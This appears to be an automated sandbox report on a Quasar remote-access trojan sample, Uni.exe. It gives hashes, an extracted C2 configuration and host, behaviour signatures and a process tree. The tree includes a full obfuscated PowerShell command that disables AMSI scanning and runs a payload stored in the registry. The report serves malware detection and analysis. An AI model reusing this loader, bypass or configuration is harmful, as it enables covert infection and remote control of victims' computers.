Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1800s -
max time network
1789s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
08/05/2024, 17:28
Behavioral task
behavioral1
Sample
Uni.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.exe
Resource
win7-20240419-en
Behavioral task
behavioral3
Sample
Uni.exe
Resource
win10v2004-20240508-en
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
7417c8c73e614f293152575f46134216
-
SHA1
cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
-
SHA256
00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
-
SHA512
897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
SSDEEP
6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-dOMA5C0pQTTpKjVsCp
-
encryption_key
UBXs44u6E81wxBGZxQHk
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-KEYLOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/memory/4920-1-0x0000000000B30000-0x0000000000B9C000-memory.dmp family_quasar behavioral1/files/0x000800000001ac35-11.dat family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4392 created 588 4392 powershell.EXE 5 PID 1000 created 588 1000 powershell.EXE 5 -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 2524 $sxr-powershell.exe 4608 install.exe 3660 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 raw.githubusercontent.com 7 raw.githubusercontent.com 10 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4392 set thread context of 2164 4392 powershell.EXE 89 PID 1000 set thread context of 1984 1000 powershell.EXE 90 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4648 schtasks.exe 1812 SCHTASKS.exe 4516 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={447BF857-54C7-402E-9358-1A2490BB118D}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 08 May 2024 20:31:10 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4392 powershell.EXE 4392 powershell.EXE 4392 powershell.EXE 1000 powershell.EXE 1000 powershell.EXE 1000 powershell.EXE 4392 powershell.EXE 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 1000 powershell.EXE 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4920 Uni.exe Token: SeDebugPrivilege 2524 $sxr-powershell.exe Token: SeDebugPrivilege 4392 powershell.EXE Token: SeDebugPrivilege 1000 powershell.EXE Token: SeDebugPrivilege 4392 powershell.EXE Token: SeDebugPrivilege 2164 dllhost.exe Token: SeDebugPrivilege 1000 powershell.EXE Token: SeDebugPrivilege 1984 dllhost.exe Token: SeAuditPrivilege 2508 svchost.exe Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE Token: SeAuditPrivilege 2508 svchost.exe Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE Token: SeAuditPrivilege 2508 svchost.exe Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE Token: SeAuditPrivilege 2508 svchost.exe Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2524 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4920 wrote to memory of 4648 4920 Uni.exe 76 PID 4920 wrote to memory of 4648 4920 Uni.exe 76 PID 4920 wrote to memory of 4648 4920 Uni.exe 76 PID 4920 wrote to memory of 2524 4920 Uni.exe 78 PID 4920 wrote to memory of 2524 4920 Uni.exe 78 PID 4920 wrote to memory of 2524 4920 Uni.exe 78 PID 4920 wrote to memory of 4608 4920 Uni.exe 79 PID 4920 wrote to memory of 4608 4920 Uni.exe 79 PID 4920 wrote to memory of 4608 4920 Uni.exe 79 PID 4920 wrote to memory of 1812 4920 Uni.exe 80 PID 4920 wrote to memory of 1812 4920 Uni.exe 80 PID 4920 wrote to memory of 1812 4920 Uni.exe 80 PID 2524 wrote to memory of 4516 2524 $sxr-powershell.exe 84 PID 2524 wrote to memory of 4516 2524 $sxr-powershell.exe 84 PID 2524 wrote to memory of 4516 2524 $sxr-powershell.exe 84 PID 2524 wrote to memory of 3660 2524 $sxr-powershell.exe 86 PID 2524 wrote to memory of 3660 2524 $sxr-powershell.exe 86 PID 2524 wrote to memory of 3660 2524 $sxr-powershell.exe 86 PID 4392 wrote to memory of 2164 4392 powershell.EXE 89 PID 4392 wrote to memory of 2164 4392 powershell.EXE 89 PID 4392 wrote to memory of 2164 4392 powershell.EXE 89 PID 4392 wrote to memory of 2164 4392 powershell.EXE 89 PID 4392 wrote to memory of 2164 4392 powershell.EXE 89 PID 4392 wrote to memory of 2164 4392 powershell.EXE 89 PID 4392 wrote to memory of 2164 4392 powershell.EXE 89 PID 4392 wrote to memory of 2164 4392 powershell.EXE 89 PID 2164 wrote to memory of 588 2164 dllhost.exe 5 PID 2164 wrote to memory of 644 2164 dllhost.exe 7 PID 2164 wrote to memory of 748 2164 dllhost.exe 10 PID 2164 wrote to memory of 920 2164 dllhost.exe 13 PID 2164 wrote to memory of 1004 2164 dllhost.exe 14 PID 2164 wrote to memory of 628 2164 dllhost.exe 15 PID 2164 wrote to memory of 964 2164 dllhost.exe 16 PID 2164 wrote to memory of 1028 2164 dllhost.exe 18 PID 2164 wrote to memory of 1120 2164 dllhost.exe 19 PID 2164 wrote to memory of 1152 2164 dllhost.exe 20 PID 2164 wrote to memory of 1228 2164 dllhost.exe 21 PID 2164 wrote to memory of 1236 2164 dllhost.exe 22 PID 2164 wrote to memory of 1244 2164 dllhost.exe 23 PID 2164 wrote to memory of 1312 2164 dllhost.exe 24 PID 2164 wrote to memory of 1428 2164 dllhost.exe 25 PID 2164 wrote to memory of 1448 2164 dllhost.exe 26 PID 2164 wrote to memory of 1460 2164 dllhost.exe 27 PID 2164 wrote to memory of 1516 2164 dllhost.exe 28 PID 2164 wrote to memory of 1592 2164 dllhost.exe 29 PID 2164 wrote to memory of 1636 2164 dllhost.exe 30 PID 2164 wrote to memory of 1660 2164 dllhost.exe 31 PID 2164 wrote to memory of 1740 2164 dllhost.exe 32 PID 2164 wrote to memory of 1788 2164 dllhost.exe 33 PID 2164 wrote to memory of 1796 2164 dllhost.exe 34 PID 2164 wrote to memory of 1892 2164 dllhost.exe 35 PID 2164 wrote to memory of 1908 2164 dllhost.exe 36 PID 2164 wrote to memory of 1376 2164 dllhost.exe 37 PID 2164 wrote to memory of 2076 2164 dllhost.exe 38 PID 2164 wrote to memory of 2204 2164 dllhost.exe 39 PID 2164 wrote to memory of 2268 2164 dllhost.exe 40 PID 2164 wrote to memory of 2456 2164 dllhost.exe 41 PID 2164 wrote to memory of 2464 2164 dllhost.exe 42 PID 2164 wrote to memory of 2508 2164 dllhost.exe 43 PID 2164 wrote to memory of 2692 2164 dllhost.exe 44 PID 2164 wrote to memory of 2704 2164 dllhost.exe 45 PID 2164 wrote to memory of 2736 2164 dllhost.exe 46 PID 2164 wrote to memory of 2760 2164 dllhost.exe 47 PID 2164 wrote to memory of 2768 2164 dllhost.exe 48
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:588
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1004
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c40d6ff2-e818-49f0-a56b-2b1ffbe07ea5}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2164
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2ed3ec06-3818-4543-ba68-17a489e2362b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:644
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:748
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:920
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:628
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:964
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:1028
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
PID:1120
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1152
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SRXMIHCSkCIB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vgUFJbayVmqshx,[Parameter(Position=1)][Type]$JhwfwApowY)$sqHlAhREqYB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+[Char](108)+'e'+[Char](99)+'ted'+[Char](68)+''+[Char](101)+''+[Char](108)+'eg'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'ule',$False).DefineType(''+[Char](77)+''+[Char](121)+'Dele'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+'la'+[Char](115)+''+[Char](115)+','+'P'+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+','+[Char](65)+'n'+'s'+''+'i'+'C'+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sqHlAhREqYB.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+','+[Char](72)+'i'+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$vgUFJbayVmqshx).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');$sqHlAhREqYB.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'k'+[Char](101)+'',''+'P'+'u'+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+''+'w'+''+[Char](83)+'l'+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+'r'+'t'+'u'+''+[Char](97)+''+'l'+'',$JhwfwApowY,$vgUFJbayVmqshx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+'a'+'g'+''+[Char](101)+'d');Write-Output $sqHlAhREqYB.CreateType();}$fgoHRaScHykbp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'ic'+[Char](114)+'o'+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.'+[Char](87)+''+'i'+''+[Char](110)+'3'+'2'+''+[Char](46)+'Un'+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$XoLUcKuitLhlFZ=$fgoHRaScHykbp.GetMethod(''+[Char](71)+''+'e'+''+'t'+'Pr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+'d'+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+'t'+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RhUsMUdfdaDLafYrdLp=SRXMIHCSkCIB @([String])([IntPtr]);$eFRSRwBcGZUreYFZgXlSjS=SRXMIHCSkCIB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$McivxpKPkkK=$fgoHRaScHykbp.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+'e'+'H'+''+[Char](97)+'n'+'d'+''+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'ne'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+'d'+[Char](108)+'l')));$EdDyTdnrRDOGyy=$XoLUcKuitLhlFZ.Invoke($Null,@([Object]$McivxpKPkkK,[Object]('L'+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+'r'+'y'+[Char](65)+'')));$hOBMPBAqVwRvEXDfA=$XoLUcKuitLhlFZ.Invoke($Null,@([Object]$McivxpKPkkK,[Object](''+[Char](86)+'i'+'r'+''+'t'+''+'u'+''+[Char](97)+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+'t'+'')));$cgnXEFn=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EdDyTdnrRDOGyy,$RhUsMUdfdaDLafYrdLp).Invoke(''+'a'+''+'m'+''+'s'+''+'i'+''+[Char](46)+''+'d'+''+'l'+''+'l'+'');$rZFCbzzCbmsPiTplw=$XoLUcKuitLhlFZ.Invoke($Null,@([Object]$cgnXEFn,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$cOnJjPDveQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hOBMPBAqVwRvEXDfA,$eFRSRwBcGZUreYFZgXlSjS).Invoke($rZFCbzzCbmsPiTplw,[uint32]8,4,[ref]$cOnJjPDveQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rZFCbzzCbmsPiTplw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hOBMPBAqVwRvEXDfA,$eFRSRwBcGZUreYFZgXlSjS).Invoke($rZFCbzzCbmsPiTplw,[uint32]8,0x20,[ref]$cOnJjPDveQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4392
-
-
